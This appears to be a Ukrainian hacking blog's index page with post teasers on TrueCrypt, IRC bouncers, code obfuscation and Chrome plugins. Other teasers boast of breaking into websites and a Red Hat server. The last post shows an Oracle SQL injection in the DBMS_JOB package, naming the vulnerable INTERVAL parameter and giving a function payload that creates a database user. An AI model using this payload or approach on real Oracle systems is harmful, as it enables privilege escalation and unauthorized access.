Давно нічого тут не писалось, тому вирішив трохи освіжити блог, та й нагадати начим читачам що ми існуєм). Отож почнем..

Прикупив собі новий ноутбук –  Acer Aspire 5738z. Повинен сказати – просто краса, ноутбук і справді непоганий. У зв’язку з збільшенням квоти на харддиску вирішив завести собі окремий прихований розділ, закриптований trucrypt. Все пройшло чудово, розділ захищений файлом ключів, що замасковані під mp3 файл. Та запускати зажди трукрипт, вибирати розділ, ключі, монтувати мене не приваблювало. Але ця проблема досить легко вирішилась. Як? Читаєм підкатом..

Read more…

Привіт =)
В цьому пості я постараюсь розказати ( і показати ) як встановили \ налаштувати свій ірц-баунсер (IRC bouncer) на машину з ОС Windows =)
Якшо поконкретніше, то будемо ставити psybnc 2.3.
І для цього нам потрібен дедік, VPS, чи VDS з виділеним IP =)
Read more…

Привіт =) В минулому пості я розказував про обфускацію коду, в цьому розкажу як створити свою “привязку” програми до конкретного компа.

Read more…

Знаю, знаю.. перше шо ви подумали – “таких статтей\доків є куча в мережі..”.. Причиною написання цієї замітки стала нехватка укр-статей в інтернеті.. Наприклад мені так і не вдалося знайти цікаву статтю, з кольоровими скріншотами і з детальною інструкцією встановлення \ використання обфускатора.. Сам недавно стовкнувся з проблемою захисту коду від реверсу в С#.. А так, як статей на цю тему по укр не знайшов, прийшлося самим розбиратися =) І сьогодні я постараюся просвітити вас, мої юні падавани

Read more…

Віддавати контект через php це нонсенс трошки звичайно.. але деколи так зручніше, та й зручніше Лімітувати швидкість віддачі також повинен не php скрипт, бо нагружає сервер непотрібною роботою та й витрачає його память, а сервер. Але через сервер це робити – трошки геморно Але шо поробиш, якшо немає “прямого” доступу до налаштувань apache, навіть якщо немає ssh? =( Тоді немає вибору просто.. приходиться все робити через скрипт..

Read more…

Привіт не з РОА. Щось довго я тут нічого не писав, ось вирішив вам розповісти про дружній взлом сайтів усім відомих мемберів проекту antichat.ru – Rebz та Qwazar. Якщо для першого це основне місце прибування, то для другого – це майже забутий проект.
Read more…

перл \ багатопоточність \ антикапча \ проксі
Read more…

Недавно було потрібно написати свій плагін для Хрома, прийшлося “вникнути” в алгоритм написання таких плагінів )

Про то , як написати свій плагін для Хрома – читаємо далі..
Read more…

Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.

Не буду тягнуть кота за яйця:
Read more…

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо  комусь і буде потрібно. Але щоб довести справу до переможного кінця,  знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.

...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...

Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

Ну і власне сам експлойт (під катом):
Read more...